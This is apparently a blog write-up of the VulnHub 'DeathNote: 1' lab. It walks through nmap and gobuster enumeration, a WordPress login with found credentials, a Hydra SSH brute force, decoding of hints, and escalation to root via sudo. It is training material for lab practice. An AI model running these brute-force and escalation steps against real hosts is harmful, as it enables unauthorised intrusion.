Al1z4deh:~# echo "Welcome"

May 15

4 min read

VulnHub: DeathNote: 1

Today we will take a look at Vulnhub: DeathNote. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan

Command: Command: sudo nmap -p- -sV -sC -oN nmap/open — open 192.168.0.109

  • Web pages

If there is such a problem when looking at the page, do it

Command: sudo nano /etc/hosts

Result

Let’s take notes of everything you need on the page. (name, weird sentence, everything we will use)

kira
light yagami
Soichiro Yagami

If we press the hint button, we will come across a sentence.

L’s comment is below. let’s note

my fav line is

iamjustic3

  • Gobuster

Find Site Directories

Command: Command: gobuster dir -u http://192.168.0.109 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt

Let’s look at the robots.txt extension

We found a new directory.

.jpg file may be damaged. Let’s download.

Command: wget http://deathnote.vuln/important.jpg

Command: cat important.jpg

Indicates that the password will be in the Indian button on the site. So the password is ‘iamjustic3’

The entry can also be ‘kira’ or ‘l’. Let’s check.

  • Wordpress

Url- http://deathnote.vuln/wordpress/wp-login.php

user: kira pass: iamjustic3

There is such a .txt file on the media page.

Url- http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt

They look like a password. Let’s mark it as pass.txt.

Let’s add them to User.txt.

kira
l
light
Soichiro

Let’s attack ssh.

  • Hydra

Command: hydra -L user.txt -P pass.txt ssh://192.168.0.109 -V -t 4

user- l pass- death4me

  • Ssh

Command: ssh l@192.168.0.109

it was brainfuck

Let’s decode

Brainfuck/Text/Ook! obfuscator - deobfuscator. Decode and encode online.

Edit description

www.splitbrain.org

The /opt folder also has hints that will be useful to us

Let’s decode

CyberChef

The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis

gchq.github.io

  • Kira

Command: su kira

Let’s decode in cyberchef again

Let’s look at the / var folder

Command: cd /var
Commdn: cat misa

it is toooo late for misa

let’s check the privileges

Command: sudo -l

(ALL : ALL) ALL

This means that we have authority over everything. Let’s root

Command: sudo su

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

Elman Alizadeh - Azerbaijan Architecture and Construction University - Baku, Baku, Azerbaijan |…

View Elman Alizadeh's profile on LinkedIn, the world's largest professional community. Elman has 2 jobs listed on their…

www.linkedin.com

--

--

--

More from Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Try Knowable

Recommended from Medium

Shreyaadaga

Password verification using Hashing

Laurent Mbuyu

ATM scams are real

Tim Cotten

in

Cotten.IO

Hacking GMail With Weird From Fields

LU❤️INU

The 6th $LUVINU Airdrop is now Live

Gupta Simran Santosh

in

GDSC UMIT

VIRTUAL PRIVATE NETWORK (VPN)

Nishchal Foolish Kesarwani

in

PVPL Legal

PVPL CH 3 Preseed’s Non-Disclosure Agreement

Lyndsie Durrace

{UPDATE} Fury Turn Hack Free Resources Generator

Julie Kolodgie

{UPDATE} Arcane Citadel: Duel of Mages™ Hack Free Resources Generator

AboutHelpTermsPrivacy

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

Ahmet Göker

Pointers in Depth

Nawaf Alkhaldi

Why you should never trust any website

Aircon

File Inclusion | TryHackMe (THM)

Gm4vin2tech

Frequently Using Linux Commands

Help

Status

Writers

Blog

Careers

Privacy

Terms

About

Knowable